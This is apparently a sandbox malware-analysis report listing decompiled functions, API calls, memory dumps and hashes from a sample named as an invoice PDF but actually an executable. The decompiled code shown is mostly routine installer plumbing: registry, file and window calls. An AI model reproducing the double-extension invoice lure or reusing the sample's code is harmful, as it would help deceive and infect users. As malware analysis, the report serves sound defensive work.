Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 42400e7620033b3c75d1a052fef88eb2105eaffe06110ad1b7b23095d5839a67
Instruction ID: 18a2236d2da02041d188dcbd2d72052a2a953223b30961087eade96b9ec92dd4
Opcode Fuzzy Hash: 42400e7620033b3c75d1a052fef88eb2105eaffe06110ad1b7b23095d5839a67
Instruction Fuzzy Hash: 90017171904104AFE7159FA5DE89ABFB6B8EF45348F10403EF105A62D0DAB84E449B69

Uniqueness

Uniqueness Score: -1.00%

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061A6(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t37 - 4);
				return 0;
			}

0x0040247e
0x0040247e
0x00402483
0x0040248a
0x0040248c
0x00402493
0x00402496
0x00402885
0x0040249c
0x0040249f
0x004024af
0x004024ba
0x004024ea
0x004024ea
0x004024ed
0x004024bc
0x004024c0
0x004024d9
0x004024e0
0x004024e3
0x004024c2
0x004024c5
0x004024d0
0x00402549
0x00000000
0x00000000
0x00000000
0x004024c5
0x004024c0
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 08f873b6c5f836ea2cbeb832c07c557579df9b46a08ed6a66d2a9d9fb826c037
Instruction ID: 12a56d39eb772e04bf5da2f774c5f61affeaaf74f2150d0b0e53692ad729b11e
Opcode Fuzzy Hash: 08f873b6c5f836ea2cbeb832c07c557579df9b46a08ed6a66d2a9d9fb826c037
Instruction Fuzzy Hash: 0C117371914209EFEF24DFA4CA595BEB6B4EF05344F20843FE046A72C0D7B84A45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a0c =  *0x7a7a0c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a0c, 0x7530,  *0x7a79f4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402388(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402388
0x00402388
0x0040238b
0x0040238e
0x004023cf
0x00000000
0x00402390
0x00402392
0x00402397
0x0040239b
0x00402885
0x00402885
0x004023a1
0x004023b1
0x004023b3
0x004023d1
0x004023d3
0x00000000
0x004023d9
0x004023d3
0x0040239b
0x00402ac2
0x00402ace

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023AA
RegCloseKey.ADVAPI32(00000000), ref: 004023B3

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 336ee21dce7fe236a01c35d47a8697e130fb3ea5dcd58a3cb6936f6497ca76ff
Instruction ID: 4b991d54845a8f4c2efe32c9125b9baad4d8851bb675889a970d9a4240a8a0e2
Opcode Fuzzy Hash: 336ee21dce7fe236a01c35d47a8697e130fb3ea5dcd58a3cb6936f6497ca76ff
Instruction Fuzzy Hash: 23F0F632A041149BE710BBA49B4EABEB2A5AB44354F16003FFA02F31C1CEFC4D01876D

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x7a79f0; // 0x203c2
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x24)); // executed
					_t4 =  *(_t16 - 0x28);
				}
				_t12 =  *0x7a7a04; // 0x403ba
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402ac2
0x00402ace

APIs

ShowWindow.USER32(000203C2,?), ref: 00401587
ShowWindow.USER32(000403BA), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e9d257a11957cecfd478a70c41151f4352c91d381a98e1f3aa8ce5a0ad929688
Instruction ID: 5269699cd9b299489618f1bbb9ba152c7ba26c22ef46d1a8c5e364d85c2f5657
Opcode Fuzzy Hash: e9d257a11957cecfd478a70c41151f4352c91d381a98e1f3aa8ce5a0ad929688
Instruction Fuzzy Hash: B5E086777041049FCB19DBA8ED808AE77A6FB85310718457FE502F3690CA79AD50CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00406639 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406639(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065C9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406641
0x00406644
0x0040664b
0x00406653
0x0040665f
0x00000000
0x00406666
0x00406656
0x0040665d
0x00000000
0x0040666e
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
GetProcAddress.KERNEL32(00000000,?), ref: 00406666

Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
Part of subcall function 004065C9: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D51 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D51(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d55
0x00405d62
0x00405d77
0x00405d7d

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D2C(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d31
0x00405d37
0x00405d3c
0x00405d45
0x00405d45
0x00405d4e

APIs

GetFileAttributesW.KERNELBASE(?,?,00405931,?,?,00000000,00405B07,?,?,?,?), ref: 00405D31
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D45

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 706934cb3b0fb70b74806e5ec6ddb1c8dfd6769152cd575e6ec3c276ff28a2a3
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 85D01272504420AFD6512738EF0C89BBF95DB543717028B36FAE9A22F0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040580F Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040580F(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405815
0x0040581d
0x00000000
0x00405823
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
